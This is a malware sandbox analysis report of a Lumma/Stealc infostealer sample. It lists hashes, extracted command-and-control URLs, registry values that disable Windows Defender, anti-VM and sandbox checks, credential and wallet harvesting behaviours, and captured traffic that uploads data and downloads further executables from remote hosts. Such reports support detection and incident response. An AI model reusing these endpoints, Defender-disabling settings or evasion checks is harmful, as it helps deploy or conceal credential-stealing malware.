Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
16/12/2024, 08:53 UTC
Static task
static1
Behavioral task
behavioral1
Sample
f9694cb15c258cf8125cf0c317c77479.exe
Resource
win7-20240903-en
General
-
Target
f9694cb15c258cf8125cf0c317c77479.exe
-
Size
1.8MB
-
MD5
f9694cb15c258cf8125cf0c317c77479
-
SHA1
ad7ab004164e247a32fb8eb4187103a1eaf73657
-
SHA256
37aafa95a96bdc9144593c820466f3f063cd0e9fb3c6d2bcfab4c1bf0b61e51b
-
SHA512
41504ae13f21e126508b91cdacc3d993790b7ce6001a0d58353860ad4eccb76858f553f4dd49d1960fae09a777160493932c0bb9acebd3bad3aae6e0dc2e2351
-
SSDEEP
49152:QfiXfPvlOJ1kUi0pzJZ8AMSdBtxh5WBAB6lce:Q+MJ5Zc4vWGB6+e
Malware Config
Extracted
lumma
https://sordid-snaked.cyou/api
https://awake-weaves.cyou/api
https://wrathful-jammy.cyou/api
https://debonairnukk.xyz/api
https://diffuculttan.xyz/api
https://effecterectz.xyz/api
https://deafeninggeh.biz/api
https://immureprech.biz/api
https://tacitglibbr.biz/api
Extracted
stealc
stok
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://tacitglibbr.biz/api
Signatures
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Y45X8ZJMUXMMXEEMW7H.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" Y45X8ZJMUXMMXEEMW7H.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" Y45X8ZJMUXMMXEEMW7H.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Y45X8ZJMUXMMXEEMW7H.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Y45X8ZJMUXMMXEEMW7H.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Y45X8ZJMUXMMXEEMW7H.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f9694cb15c258cf8125cf0c317c77479.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Y45X8ZJMUXMMXEEMW7H.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 08C4W427GMMLFU3HLN4KQ5504Q5ER5A.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f9694cb15c258cf8125cf0c317c77479.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f9694cb15c258cf8125cf0c317c77479.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Y45X8ZJMUXMMXEEMW7H.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Y45X8ZJMUXMMXEEMW7H.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 08C4W427GMMLFU3HLN4KQ5504Q5ER5A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 08C4W427GMMLFU3HLN4KQ5504Q5ER5A.exe -
Executes dropped EXE 2 IoCs
pid Process 2872 Y45X8ZJMUXMMXEEMW7H.exe 2708 08C4W427GMMLFU3HLN4KQ5504Q5ER5A.exe -
Identifies Wine through registry keys 2 TTPs 3 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine f9694cb15c258cf8125cf0c317c77479.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine Y45X8ZJMUXMMXEEMW7H.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 08C4W427GMMLFU3HLN4KQ5504Q5ER5A.exe -
Loads dropped DLL 3 IoCs
pid Process 2280 f9694cb15c258cf8125cf0c317c77479.exe 2280 f9694cb15c258cf8125cf0c317c77479.exe 2280 f9694cb15c258cf8125cf0c317c77479.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features Y45X8ZJMUXMMXEEMW7H.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" Y45X8ZJMUXMMXEEMW7H.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 2280 f9694cb15c258cf8125cf0c317c77479.exe 2872 Y45X8ZJMUXMMXEEMW7H.exe 2708 08C4W427GMMLFU3HLN4KQ5504Q5ER5A.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f9694cb15c258cf8125cf0c317c77479.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Y45X8ZJMUXMMXEEMW7H.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 08C4W427GMMLFU3HLN4KQ5504Q5ER5A.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 2280 f9694cb15c258cf8125cf0c317c77479.exe 2280 f9694cb15c258cf8125cf0c317c77479.exe 2280 f9694cb15c258cf8125cf0c317c77479.exe 2280 f9694cb15c258cf8125cf0c317c77479.exe 2280 f9694cb15c258cf8125cf0c317c77479.exe 2872 Y45X8ZJMUXMMXEEMW7H.exe 2708 08C4W427GMMLFU3HLN4KQ5504Q5ER5A.exe 2872 Y45X8ZJMUXMMXEEMW7H.exe 2872 Y45X8ZJMUXMMXEEMW7H.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2872 Y45X8ZJMUXMMXEEMW7H.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2280 wrote to memory of 2872 2280 f9694cb15c258cf8125cf0c317c77479.exe 32 PID 2280 wrote to memory of 2872 2280 f9694cb15c258cf8125cf0c317c77479.exe 32 PID 2280 wrote to memory of 2872 2280 f9694cb15c258cf8125cf0c317c77479.exe 32 PID 2280 wrote to memory of 2872 2280 f9694cb15c258cf8125cf0c317c77479.exe 32 PID 2280 wrote to memory of 2708 2280 f9694cb15c258cf8125cf0c317c77479.exe 33 PID 2280 wrote to memory of 2708 2280 f9694cb15c258cf8125cf0c317c77479.exe 33 PID 2280 wrote to memory of 2708 2280 f9694cb15c258cf8125cf0c317c77479.exe 33 PID 2280 wrote to memory of 2708 2280 f9694cb15c258cf8125cf0c317c77479.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\f9694cb15c258cf8125cf0c317c77479.exe"C:\Users\Admin\AppData\Local\Temp\f9694cb15c258cf8125cf0c317c77479.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Users\Admin\AppData\Local\Temp\Y45X8ZJMUXMMXEEMW7H.exe"C:\Users\Admin\AppData\Local\Temp\Y45X8ZJMUXMMXEEMW7H.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
C:\Users\Admin\AppData\Local\Temp\08C4W427GMMLFU3HLN4KQ5504Q5ER5A.exe"C:\Users\Admin\AppData\Local\Temp\08C4W427GMMLFU3HLN4KQ5504Q5ER5A.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2708
-
Network
-
Remote address:8.8.8.8:53Requesttacitglibbr.bizIN AResponsetacitglibbr.bizIN A172.67.164.37tacitglibbr.bizIN A104.21.50.161
-
Remote address:172.67.164.37:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: tacitglibbr.biz
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=jo6jug9nkv7vucvd3jekvfdk4j; expires=Fri, 11-Apr-2025 02:39:49 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b9rBNeFl6AkW691TkfZvwLkqZO9StAxukPhvb4WdY2%2BfQzjHv8wgQ8YaV0W2SGC3LuS0KuwNf0Spt0iyL%2B3nxxpNEj0%2Fu3hj7ScKkfl3jx3XzURNRLxZxr7L4EayXdthLJc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2d71061e7abd7e-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=38519&min_rtt=26306&rtt_var=17323&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2855&recv_bytes=583&delivery_rate=123307&cwnd=253&unsent_bytes=0&cid=cb93a2d49037a326&ts=267&x=0"
-
Remote address:172.67.164.37:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 47
Host: tacitglibbr.biz
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=nr0k3c2piii691qjclqja2jl3l; expires=Fri, 11-Apr-2025 02:39:49 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cS9eedn9M6J5KqhxDMi9UCwYv65vI%2Bq0NdUULEvBaiWKnrtvE2%2BPXpgzXtwS7r7tDJWnbC5mrdnc4lTv1mhyCccXDPOQ4ZKhx8rejNIbn8%2BRy1%2Fi693hk1WEqQXG7nahbz8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2d71074822bd7e-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=37587&min_rtt=26306&rtt_var=14857&sent=9&recv=10&lost=0&retrans=0&sent_bytes=3953&recv_bytes=961&delivery_rate=123307&cwnd=255&unsent_bytes=0&cid=cb93a2d49037a326&ts=387&x=0"
-
Remote address:172.67.164.37:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=V8110J86FY08TQPX1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12302
Host: tacitglibbr.biz
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=310jvamhfo2lil6j5k7iq9u5f0; expires=Fri, 11-Apr-2025 02:39:50 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TWdczoINCSi5xIS%2FAKE0dFpw%2B7Pei%2FCIlgsOB0UyWYonGAhSOimsA7ow%2BYglPV0mMsY4y8J9CqTjNgmblymaNKSu%2BNpMBOY0pGN9HKJTWLw9HgtJYk9rsCdnSrm5QGe1wcs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2d710899c0bd7e-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=29440&min_rtt=26021&rtt_var=4408&sent=33&recv=33&lost=0&retrans=0&sent_bytes=24161&recv_bytes=13611&delivery_rate=1027437&cwnd=257&unsent_bytes=0&cid=cb93a2d49037a326&ts=675&x=0"
-
Remote address:172.67.164.37:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=BV4J34IA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18510
Host: tacitglibbr.biz
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=90jsnmt8u6qs6hm14m0l8d45oj; expires=Fri, 11-Apr-2025 02:39:50 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rsy3zDK0CJqKKJBAEhKvDFIqYPuyjL9MmYKkQk95tpIPaZ4yu78g%2FOht33CnFSxnX5Rqfsc10ff%2BAro%2BmrpnTI4foAwRloJ6KOOD3i%2BT2IzktFU6rPvlDWqYx913DTJZgUI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2d710aad7994ed-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=27565&min_rtt=26297&rtt_var=7730&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2856&recv_bytes=19148&delivery_rate=131820&cwnd=253&unsent_bytes=0&cid=0c4f30d5c7c01790&ts=315&x=0"
-
Remote address:172.67.164.37:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=9S6UKB076
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1270
Host: tacitglibbr.biz
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ve81cvftnlb2glab215trnc1re; expires=Fri, 11-Apr-2025 02:39:50 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vBLukK9z9A1UjcK3YpO2LIfhKhwl4i8O0B1sGJTMixjMG0pl2SYWpfxUuynVZxRb3ESpxyFaNexNQgmAb6fv7E%2FcMCFwhf9PN009AuFFveugHZgYLXT%2F6AUY2fj8Ut%2Fia7s%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2d710d7fa8ef4a-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=27608&min_rtt=26391&rtt_var=7606&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2857&recv_bytes=1863&delivery_rate=134939&cwnd=253&unsent_bytes=0&cid=7910fcd3b9357cdf&ts=226&x=0"
-
Remote address:172.67.164.37:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=RLJ6K1V8Y0HJGHY4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1108
Host: tacitglibbr.biz
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=fkevkfgu3men15hmjb8tv29uea; expires=Fri, 11-Apr-2025 02:39:51 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=64hxAdVU9727yB2Njlbgg9artY%2BVlLCTgucOEPYo6ABRt5udUS7z%2FMmJvGTPH12K4%2Bp1Cu5Sxmeg0LDC27r8gNSiOKXYtwdA2d%2F9NGmFrWt1f%2Fj4SgttxuO586%2FZDsVzZkg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2d710fcd23f662-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=33874&min_rtt=25987&rtt_var=17034&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2855&recv_bytes=1703&delivery_rate=104436&cwnd=252&unsent_bytes=0&cid=ff0b0d8c570365e6&ts=222&x=0"
-
Remote address:172.67.164.37:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 82
Host: tacitglibbr.biz
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=fdobvondj9v3noh0clrdj0qcgg; expires=Fri, 11-Apr-2025 02:39:51 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4YKBEeZ%2BVmB32EiipNyM9u%2FBdpe5fkKaHWnscjfyKEmYauZKYUNVkxtgfZuFSD8%2B7sh%2BqGEnRRwR6sA%2FwEHGQYe1b%2FqkWGS0iXfyeh8oTNjhm08zbNPe6VX06Fwgm%2BZQogg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f2d7111296cf658-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=29240&min_rtt=26425&rtt_var=7662&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2856&recv_bytes=663&delivery_rate=132722&cwnd=253&unsent_bytes=0&cid=a1f5835c4c1dc799&ts=172&x=0"
-
Remote address:185.215.113.16:80RequestGET /off/def.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 08:53:12 GMT
Content-Type: application/octet-stream
Content-Length: 2791424
Last-Modified: Mon, 16 Dec 2024 08:24:32 GMT
Connection: keep-alive
ETag: "675fe3c0-2a9800"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestGET /steam/random.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 08:53:13 GMT
Content-Type: application/octet-stream
Content-Length: 1802240
Last-Modified: Mon, 16 Dec 2024 08:26:03 GMT
Connection: keep-alive
ETag: "675fe41b-1b8000"
Accept-Ranges: bytes
-
Remote address:185.215.113.206:80RequestGET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.206:80RequestPOST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKJEHJKJEBGHJJKEBGIE
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
15.2kB 26.8kB 36 37
HTTP Request
POST https://tacitglibbr.biz/apiHTTP Response
200HTTP Request
POST https://tacitglibbr.biz/apiHTTP Response
200HTTP Request
POST https://tacitglibbr.biz/apiHTTP Response
200 -
20.1kB 4.5kB 23 14
HTTP Request
POST https://tacitglibbr.biz/apiHTTP Response
200 -
2.3kB 4.4kB 10 10
HTTP Request
POST https://tacitglibbr.biz/apiHTTP Response
200 -
2.1kB 4.4kB 10 10
HTTP Request
POST https://tacitglibbr.biz/apiHTTP Response
200 -
1.1kB 4.5kB 9 9
HTTP Request
POST https://tacitglibbr.biz/apiHTTP Response
200 -
133.5kB 4.7MB 2462 3391
HTTP Request
GET http://185.215.113.16/off/def.exeHTTP Response
200HTTP Request
GET http://185.215.113.16/steam/random.exeHTTP Response
200 -
185.215.113.206:80http://185.215.113.206/c4becf79229cb002.phphttp08C4W427GMMLFU3HLN4KQ5504Q5ER5A.exe727 B 625 B 5 5
HTTP Request
GET http://185.215.113.206/HTTP Response
200HTTP Request
POST http://185.215.113.206/c4becf79229cb002.phpHTTP Response
200
MITRE ATT&CK Enterprise v15
Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Modify Registry
2Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD53aacd7d2751e6e0f434b9809f58b92bc
SHA1a398a3b7487129b2f2bd94136da6ca36e91d7505
SHA2562abc9291898edaa673b4754a60c0154084112532a7f76c36fee1e97cec5685ab
SHA51256ae68afbd59926feb21f6ff2662e3c26f461c9e7a52b26add2d8bdeda7b381ce6fde1ef787310aab666ab84a27e884810efb56ac65968c1d71fceb963516cf3
-
Filesize
2.7MB
MD5f0a01acbb7c142ecdb64c66fe7e5da72
SHA1bd76e25d19deca688e85a0c2afefebfbd2ed5708
SHA25691ea2a284a8ee25b4ad74669df7d2f5362f8e88b45c5ad0471b8fff15b1cea7f
SHA512fad5447153b4c9e95f787861dc41280b6192a71d7612772a5f4d579d7629cd2294e08b6274bba1a0c7184b1db8221a949264cd3353ee0ef40d2e7d227deafe4b